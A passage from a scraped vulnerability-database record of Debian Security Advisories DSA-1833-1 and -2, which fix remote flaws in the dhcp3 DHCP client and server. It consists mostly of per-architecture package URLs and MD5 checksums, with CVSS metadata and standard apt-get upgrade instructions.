3d1d50251c7953847178a888e6cd91cf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_arm.udeb\n Size/MD5 checksum: 170066 18a05aa4dfe765c6cc3f99b31e77ecac\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 227670 41fc7a60258569b01280b594d6293264\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 337326 266b173681f5c3ea777ae7710cbee665\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 109000 d04801f4eb76218ff8d8e791acef63ad\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 103446 dd8d97b1c2364fd1995861454b1fc4a4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_armel.udeb\n Size/MD5 checksum: 170862 6d71afbbe92432bd1a97c264cfd63561\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 293940 13e80b7f3b18b939c59193433f72e7b5\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 293866 e1aaacdd2982b92f1e08126a8a8f2651\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 128540 42870a2ec98979a8c59e23bc6fab70f6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 324744 243543866ed9202ce92e9ddc8341fd22\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 252142 d0e2729de7ff5da898457d7ee7d1b006\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 315534 1657f330bf1b1aacb9b14b419ad003a5\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 369264 20f45be07aa3a831d7ea7a3dfaece2d1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_hppa.udeb\n Size/MD5 checksum: 194978 aa479a0645490f800b342aff92bef059\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 116256 dbb01f0c3302f6e35a30e8e5572bf244\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 286974 7129977793036958290bbae514dbf1d6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 289992 ea449e5b736070fae42f67792eb0e47e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 223668 d943808ec256705e0950fe652bb6f9b4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 102102 2522fcb18f0a6f4aa2f8bbc07427e237\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_i386.udeb\n Size/MD5 checksum: 167012 e642d66307eff2f9a6ece11291b4a06d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 332706 647086523305d950e2aebc1805cf2e92\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 106618 c0430456e7d746d57fd58a676147950f\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 155090 8f8b0bfb1d3e0755c15df15fc920a8af\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_ia64.udeb\n Size/MD5 checksum: 289292 c997f11a86e7df414bacbad0e5e944be\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 159892 12cd71f2e058c63a602d74983adb5c39\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 464804 ceb110ae2899d450987ca83dfdb38944\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 347522 4c9f4bdec5669dc29b46a6e83a4fa5ef\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 508092 a1a293a6ddee469e040d7ff364ee791a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 400328 937f8ee9ac9d25af6921222e7b92a108\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 123936 53d5f37d69d182cbbe312f52550a84b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 114502 dee95947cb21084abf748e8a42960846\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_mips.udeb\n Size/MD5 checksum: 188178 2926264f19c138bdd2c72458606e4c0c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 359836 a903759df5a549c6a5e3aa227790fe04\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 308718 a476ebabd4537f41f1d5a787ea7ff9fa\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 245276 c95b1fccff2d8ad01b5cbc4981eeac8c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 314998 80f09a90d259ce66a342447d98a9a379\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 247700 eda49dcddd8fdfd58b85645c315c5faf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 310874 a05df96245d09530155f9e81bd63a4fb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 362206 a57eeaf69fd65711afe6cb5417e5f0df\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 125542 4a1784603dae8acfae95d4f9d0ce8e30\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_mipsel.udeb\n Size/MD5 checksum: 190284 30cff1bafcc1ba24b5b5ab7495798dea\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 116262 f3956046702a31009c21bc4a18279052\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 317264 25bb814dfa93b8114fc6d0a0ddd0cbdf\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 111052 8e0dfe581f4cfb3bcd0e74490cbcffab\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 119514 99c8afb47de64f36a82db6cd21513476\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 241126 e779f852e414e537a35295f238d38356\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 353466 9af62ed705a6ae46b208579dfa481d6a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_powerpc.udeb\n Size/MD5 checksum: 183816 4438592b9fdf9117b8c037a7047ee5f8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 310638 3d93a3137afe44b45de6c398bdb701c8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 304958 b2a44d63cc34124883564f5296ef18e7\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 117592 db3a8ae34c5e3a836dbf9e72c5067a90\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 348950 3ecac83017405ee2aa924cfb5905233d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_s390.udeb\n Size/MD5 checksum: 182078 35859dae5c87aae0fef90f2ab796714e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 112450 1243ac51995a6a6492d8b3da08d6fd5a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 239428 ea577141dbeff528fa9b431fd712d7e8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 303426 546d21f56cfad698fa28856cc2181c19\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 303700 4e76286fe1a10d48537c4246b35526b9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 283826 c0f5fce1f190aabd11b1851636af3ea3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 324576 13f0ac8544ff2f50b27a44dc1d0e5e95\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 279396 6171cb5605c87dddaa215eba5f15e38d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 218466 e3fab612bad763549dd5d4cd94dd6892\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 101600 d5d9016bdb0723205e3b0e5463315fda\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 109816 85e004868374d6dbc78255efff2fbf7f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_sparc.udeb\n Size/MD5 checksum: 161378 2b4b855d8e3b8790e34a3de715df9db2\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2009-08-25T19:57:28", "type": "debian", "title": "[SECURITY] [DSA 1833-2] New dhcp3 packages fix arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2009-08-25T19:57:28", "id": "DEBIAN:DSA-1833-2:0E236", "href": "https://lists.debian.org/debian-security-announce/2009/msg00190.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T12:53:13", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1833-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 14, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dhcp3\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-0692 CVE-2009-1892\nCERT advisory : VU#410676\n\nSeveral remote vulnerabilities have been discovered in ISC&#x27;s DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using &quot;dhcp-client-identifier&quot;\nand &quot;hardware ethernet&quot;. This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 3.0.4-13+etch2.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny2.\n\nFor the unstable distribution (sid), these problems will be fixed\nsoon.\n\nWe recommend that you upgrade your dhcp3 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.diff.gz\n Size/MD5 checksum: 116721 6d49a9fb6b0617aba87cd90abef5bd57\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4.orig.tar.gz\n Size/MD5 checksum: 721450 aeb916fbb50edc320f142cd6a74cb48c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.dsc\n Size/MD5 checksum: 1077 50aac538f9bb0e11e878758d754b1e14\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 157948 502301a6539a30b14cd2d6c8fb1bd032\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 113528 c89f3dfd91bbb2d8850359b78f5eae66\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_alpha.udeb\n Size/MD5 checksum: 192724 a4b5cab9e6f14ad9a80bef648435b86c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 240720 48996d54bf9d3fbae7d0a4f2b0e76224\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 304078 2e58f7af0c23b07b81b7e88031ec22b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_alpha.deb\n Size/MD5 checksum: 346552 96169b1056055a13cbfb13fb8f73b061\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_amd64.udeb\n Size/MD5 checksum: 174734 3de2c8f75f8d6df63870c2d9638c8ae6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 287422 052994dc5544eacac9b22837bba47660\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 222104 185470021c69635074e4d09a05275f49\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 131134 33fbb0278c39d36b2a0dd3819e192493\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 321874 e3ce73d54b47a930e440626672fcd521\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_amd64.deb\n Size/MD5 checksum: 103610 04e95fd257de2ca592e09cf8927b9c37\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 99498 8098ab4856d359049538213ec0fa4a75\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_arm.udeb\n Size/MD5 checksum: 167040 21fcc83a87ed431f9d03b0479b522dd2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 280430 9355307446248854bffbe49a2120d450\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 215172 0ab20469ee9fe1ccf05bfe40b68bc2d7\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 123860 2b69130163d2cb83009710081a5be3ea\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_arm.deb\n Size/MD5 checksum: 314402 191cff362f2ceb557495d037aa2310c8\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 103994 3cbfc2d7eea1de9bf64f84d31889bf75\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_hppa.udeb\n Size/MD5 checksum: 171728 68bc286a4261035d72bbb1a63eb08dd9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 219790 b8e006bf59ac068513e4bb35c4c96d2d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 139516 ee6ad7d1fd911b98cd40290823cdd50d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 319134 d36a40e22c468e76386b2ab6befd8424\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_hppa.deb\n Size/MD5 checksum: 285302 09641cca4ba379d61c1dca0fbde543fb\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 265170 5f0e7243ba3c59251a236b332fa0818f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 290962 ecb192ccc56b7982a8c60e54e4d55bbb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 198194 fe580c33e7953d727015063e3e24d209\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 92416 686a574fea049cf930757230f86af87b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_i386.udeb\n Size/MD5 checksum: 150410 d3747839582b942b155f427a4034f6b7\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_i386.deb\n Size/MD5 checksum: 116952 340249d4e0ba06007f063b501dfeac0e\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 460536 81350e4d73103ffe454ae70a3f2ab967\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 381784 161f51028930ea9a1a078e9f6bc8070c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 325064 b51fa5cffbfd6e8daa2319ce287e6310\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 182712 0961dfa19e58b2fda1b397cccf0c56b2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_ia64.udeb\n Size/MD5 checksum: 276972 7f96a3e76a36e8ecb74ae56a3066db91\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_ia64.deb\n Size/MD5 checksum: 150950 b62bfa283012eefe6123e4d57eafb95b\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mips.udeb\n Size/MD5 checksum: 178822 f5413f7bc85b1c4f2b1c5fc1310b5101\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 290490 a1df2dcfa3ccd3b787822d92979d1879\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 227208 6795dad252df73ccad7093284117bc14\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 137836 f3cb677fc63e5ad63d0ffb038bac2d8e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 327612 a84dd37caf4e3a076d17fbb30e242656\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mips.deb\n Size/MD5 checksum: 107814 a6c576fe51309fa51bc852e3cb061051\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 289074 4c60b9d7ed1e6ebcc0a3e4233b4bad3b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 225724 65671425f5a4d6468933dd782807ad0b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 107314 2be8a4eb41d646e9aee26f1f2c02e63b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mipsel.udeb\n Size/MD5 checksum: 177428 38810775a90a8dcaf51ecd4b62ff62d3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 137384 e5b6a97e69a9b63f22762bf74c79bdfe\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mipsel.deb\n Size/MD5 checksum: 325660 db87a9bd8bcf73ffab1bf87171c4d18f\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 95268 51a2d9e53a0d0d9bf3d948f8d2a045e4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 270644 29d8e657d95c12f489215de503c24ffb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_powerpc.udeb\n Size/MD5 checksum: 155886 0ac02169c239b24ad9fddfa5e237186a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 130298 d93a5ddd00026cbaccd7a43c12d7eed5\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 204226 b9c8f25ae0502d86a0db2a3ebeacee88\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 299368 5022ae153ee18c6684c1b5a8b7c78a8f\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 202674 3219218e6e886505c7268e30344a199e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 125748 c3678c9c265ad4288a77147d99038b33\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 95246 db0c1035d5aefd6fc9a1682c3ea6fefb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 296420 2a73341aa7331f0ab4038fc3587850bf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 268822 6a6380bdd4dfc204e602f86c3f5e2ae9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_sparc.udeb\n Size/MD5 checksum: 154910 6dc0420162294571d894ed490d569fe9\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1.orig.tar.gz\n Size/MD5 checksum: 798228 fcc19330a9c3a0efb5620409214652a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.diff.gz\n Size/MD5 checksum: 128880 72d4201330b347bfd5ccb15cad39c98f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.dsc\n Size/MD5 checksum: 1488 595d2c450fe04edac8e5fcf916480a84\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp-client_3.1.1-6+lenny2_all.deb\n Size/MD5 checksum: 22976 0216788c7652496df9d297d3df2a81e7\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 394400 cb8559b314619922a91374579d6959c4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 148276 a8a666404ecf773eaeaab5a2423b540e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 348508 cfc96c8147d27237b57e4e698f393cda\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 127480 989117e4e0bd1b90cbd5cd0ec06377d0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 271974 b36ad4833551063757e31562c713d4ae\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_alpha.udeb\n Size/MD5 checksum: 215130 326aaed7e5144102deed214c5ab6a14c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 333764 b8ebbb4d8a8ac528a685490483da09f1\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 358390 68dccbc7e63ffb59c9ef2af3bfe4c7b3\n 